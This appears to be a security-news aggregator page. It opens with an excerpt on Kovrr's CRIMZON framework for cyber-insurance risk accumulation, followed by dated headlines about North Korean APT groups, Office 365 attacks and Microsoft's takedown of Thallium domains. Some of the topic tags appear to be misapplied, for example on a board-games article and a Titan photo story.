Abstract: The CRIMZON™ framework defines the minimal elements needed to provide a view of accumulated cyber risk. For natural catastrophe risk, individual policy exposures can be aggregated within geographic zones. Similarly, cyber exposures can be aggregated using CRIMZON™. Location also holds importance when assessing cyber catastrophe risk; however, two additional elements must be taken into account to properly assess cyber risk accumulation: industry and company size. Insured companies with common characteristics related to location, industry, and entity size tend to be exposed to similar types of cyber events because these elements also correspond to the technologies or service providers used. Based on an analysis of millions of cyber events in the last 20 years, Kovrr conducted extensive research to serve as the core empirical validation for the CRIMZON framework. Below is a subset of the research, in which a study group of 120 CRIMZON was determined by selecting the CRIMZON with the highest relevance to the cyber insurance market (the research group was compiled according to criteria detailed in Appendix A). The total number of unique companies in the study group is 20,000, with an average of 152 companies within a CRIMZON and a median of 86 companies. The research criteria focused on companies’ location, industry, entity size, and the hosting and mail technology and service providers used by companies. The results showed a concentration of technologies and services when grouping by location, and further concentration when adding the additional elements of the CRIMZON, entity size and industry, to the analysis.
The research shows that companies within the same CRIMZON have the tendency to use the same service providers and technologies, and that different compositions of service providers and technologies can be found across CRIMZON. When trying to estimate accumulations of potential losses from cyber, insurance and reinsurance companies face two main challenges: identifying which policies are exposed to the same cyber events and determining how many policies will be affected at the same time. The former is related to the problem of enumerating all technologies and service providers each insured relies upon; the latter is equivalent to estimating the footprint of a cyber event. Analyzing accumulations by CRIMZON enables risk professionals to make sense of the size and extent of potential losses from cyber without necessarily needing to collect detailed information about technologies and service providers for each insured. The framework is completely agnostic to the line of business, therefore unlocking a full range of possible applications across both silent and affirmative cyber coverages. Among these applications is the development of aggregate models. This research shows it is possible to estimate the two key ingredients needed for the development of industry loss curves, the hazard and the exposure, using the CRIMZON as the atomic unit of aggregation. By identifying the correlation across CRIMZON, an aggregate model can then be developed.
Introduction - What are CRIMZON™? The Cyber Risk Accumulation Zones (CRIMZON™) framework defines the minimal elements needed to provide a view of aggregated cyber exposure. Kovrr launched CRIMZON during participation in the fourth cohort of the Lloyd’s Lab, the insurance technology accelerator operated by Lloyd’s of London. CRIMZON is an open framework created to facilitate better communication across players in the cyber insurance value chain. The framework allows users to overlay their data pertaining to loss, cyber attack frequency, and additional data onto the CRIMZON for additional insight into risk per zone and to detect correlations between different zones. The framework was created to support efforts for setting a standard for data collection for cyber risk management. The CRIMZON are composed of the following three elements: Location - country-level worldwide a Vulnerability Studies Cloud ★★★
The_Hackers_News.webp 2020-11-03 03:49:37 New Kimsuky Module Makes North Korean Spyware More Powerful (direct link) A week after the US government issued an advisory about a "global intelligence gathering mission" operated by North Korean state-sponsored hackers, new findings have emerged about the threat group's spyware capabilities. The APT - dubbed "Kimsuky" (aka Black Banshee or Thallium) and believed to be active as early as 2012 - has now been linked to as many as three hitherto undocumented malware, Threat Cloud APT 37
SecurityAffairs.webp 2020-11-02 16:40:03 North Korea-Linked APT Group Kimsuky spotted using new malware (direct link) North Korea-linked APT group Kimsuky was recently spotted using a new piece of malware in attacks on government agencies and human rights activists. North Korea-linked cyber espionage group Kimsuky (aka Black Banshee, Thallium, Velvet Chollima) was recently observed using new malware in attacks aimed at government agencies and human rights activists. The Kimsuky APT […] Malware Cloud APT 37
Pirate.webp 2020-09-15 11:22:27 New vulnerabilities allow Microsoft 365 multi-factor authentication to be bypassed (direct link) Multi-factor authentication (MFA) has quickly become an indispensable security measure for cloud applications during the global Covid-19 pandemic. With the acceleration of remote working, demand for cloud-based applications such as email and collaboration platforms has exploded. Cloud
ZDNet.webp 2020-08-18 04:35:04 US Army report says many North Korean hackers operate from abroad (direct link) US Army says many North Korean hackers are actually located outside the hermit kingdom, in countries like Belarus, China, India, Malaysia, and Russia. Cloud APT 37
Mandiant.webp 2020-07-30 14:00:00 Obscured by Clouds: Insights into Office 365 Attacks and How Mandiant Managed Defense Investigates
(direct link)
With Business Email Compromises (BECs) showing no signs of slowing down, it is becoming increasingly important for security analysts to understand Office 365 (O365) breaches and how to properly investigate them. This blog post is for those who have yet to dip their toes into the waters of an O365 BEC, providing a crash course on Microsoft's cloud productivity suite and its assortment of logs and data sources useful to investigators. We'll also go over common attacker tactics we've observed while responding to BECs and provide insight into how Mandiant Managed Defense analysts approach these
Cloud ★★★★
WiredThreatLevel.webp 2020-04-29 14:00:00 6 Best Board Games You Can Play With Friends Over Zoom (Video Chat) (direct link) Don't let the Covid-19 quarantine turn you into a hermit. Video chat with some friends and play a game together. Cloud APT 37
itsecurityguru.webp 2020-01-03 10:40:14 Microsoft helps shutter domains run by North Korean cybergang Thallium (direct link) A U.S. district court issued an order enabling Microsoft to take over 50 domains used by a North Korea-based cybercrime gang to conduct spear phishing campaigns. Microsoft's Digital Crimes Unit and the Microsoft Threat Intelligence Center took down the domains controlled by a group it named Thallium after researching the malicious actors' activity and filing […] Threat Cloud APT 37
01net.webp 2019-12-31 02:39:43 Microsoft takes down 50 domain names operated by formidable North Korean hackers (direct link) The Thallium group used them to infiltrate American, Japanese and South Korean institutions. To do so, Microsoft obtained an order from the US authorities. Cloud APT 37
SecurityAffairs.webp 2019-12-30 21:57:04 Microsoft sued North Korea-linked Thallium group (direct link) Microsoft sued the North Korea-linked APT Thallium for hacking into its customers’ accounts and networks via spear-phishing attacks. Microsoft sued a North Korea-linked cyber espionage group tracked as Thallium for hacking into its customers’ accounts and networks via spear-phishing attacks. The hackers target Microsoft users by impersonating the company, according to a lawsuit unsealed Dec. 27 in […] Cloud APT 37
ZDNet.webp 2019-12-30 21:53:41 Microsoft takes down 50 domains operated by North Korean hackers (direct link) Microsoft takes control of 50 domains operated by Thallium (APT37), a North Korean cyber-espionage group. Cloud APT 37
bleepingcomputer.webp 2019-12-30 13:01:33 Microsoft Takes North Korean Hacking Group Thallium to Court (direct link) Microsoft sued a cyber-espionage group with North Korean links tracked as Thallium for breaking into its customers' accounts and networks via spear-phishing attacks with the end goal of stealing sensitive information, as shown by a complaint unsealed on December 27. [...] Cloud APT 37
SecurityAffairs.webp 2019-05-14 12:48:00 North Korea-linked ScarCruft APT adds Bluetooth Harvester to its arsenal (direct link) The North Korea-linked APT group ScarCruft (aka APT37 and Group123) continues to expand its arsenal by adding a Bluetooth Harvester. North Korea-linked APT group ScarCruft (aka APT37, Reaper, and Group123) continues to expand its arsenal by adding a Bluetooth Harvester. ScarCruft has been active since at least 2012; it made the headlines in early February […] Cloud APT 37
SecurityWeek.webp 2019-05-13 15:29:00 North Korea-Linked 'ScarCruft' Adds Bluetooth Harvester to Toolkit (direct link) A North Korea-linked threat group tracked as ScarCruft, APT37 and Group123 continues to evolve and expand its toolkit, Kaspersky Lab reported on Monday. Threat Cloud APT 37
bleepingcomputer.webp 2018-10-01 11:00:00 Report Ties North Korean Attacks to New Malware, Linked by Word Macros (direct link) Newly discovered malware from the world of cyberespionage connects the dots between the tools and operations of the little-known Reaper group, believed to act on behalf of the North Korean government. [...] Malware Cloud APT 37
Checkpoint.webp 2018-08-15 12:30:04 July's Most Wanted Malware: Attacks Targeting IoT and Networking doubled since May 2018 (direct link) Three IoT vulnerabilities entered July's top ten most exploited vulnerabilities list, as threat actors have doubled their attacks on these Mirai and Reaper-related vulnerabilities since May 2018. During July 2018, three IoT vulnerabilities entered the Top 10 most exploited list: MVPower DVR router Remote Code Execution at #5; D-Link DSL-2750B router Remote Command Execution… Threat Cloud APT 37
SecurityAffairs.webp 2018-08-10 16:15:03 The analysis of code reuse revealed many links between North Korean malware (direct link) Security researchers at Intezer and McAfee have conducted a joint investigation that allowed them to collect evidence linking malware families attributed to North Korean APT groups such as the notorious Lazarus Group and Group 123. The experts focused their analysis on code reuse; past investigations revealed that some APT groups share portions of code […] Malware Medical Cloud APT 38 APT 37
mcafee.webp 2018-08-09 13:00:01 Examining Code Reuse Reveals Undiscovered Links Among North Korea's Malware Families (direct link) This research is a joint effort by Jay Rosenberg, senior security researcher at Intezer, and Christiaan Beek, lead scientist and senior principal engineer at McAfee. Intezer has also posted this story. Attacks from the online groups Lazarus, Silent Chollima, Group 123, Hidden Cobra, DarkSeoul, Blockbuster, Operation Troy, and 10 Days of Rain are believed to … Malware Guideline Medical Cloud APT 38 APT 37
WiredThreatLevel.webp 2018-07-21 12:00:00 Space Photos of the Week: Sweeping the Clouds Away on Titan (direct link) With infrared eyes, astronomers are more than scratching the surface of Saturn's hazy moon. Cloud APT 37
Blog.webp 2018-07-12 14:35:00 Military documents about MQ-9 Reaper drone leaked on dark web (direct link) Hackers have put up for sale on the dark web sensitive military documents, some associated with the U.S. military’s MQ-9 Reaper drone aircraft, one of its most lethal and technologically advanced drones, security research firm Recorded Future recently discovered. The firm’s Insikt Group on June 1 observed a bad actor trying to sell... Cloud APT 37
Last update at: 2024-06-30 18:08:01